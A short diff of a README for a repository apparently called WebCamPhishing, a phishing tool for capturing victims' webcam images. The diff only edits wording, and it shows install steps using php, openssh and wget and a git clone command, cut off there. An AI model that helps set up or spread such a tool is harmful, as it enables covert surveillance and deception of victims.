Jasutinn/WebCamPhishing/README.md

 </ul>

 # Installing and requirements
-<p>This tool require PHP for webserver, SSH or serveo link.
+<p>This tool require PHP for webserver, SSH or Serveo link.
 First run following command on your terminal</p>

 ```
 sudo apt -y install php openssh git wget unzip
 ```

-## Installing (Kali Linux/Termux):
+## Follow the command to use the module:

 ```
 git clone https://github.com/jasut1n/WebCamPhishing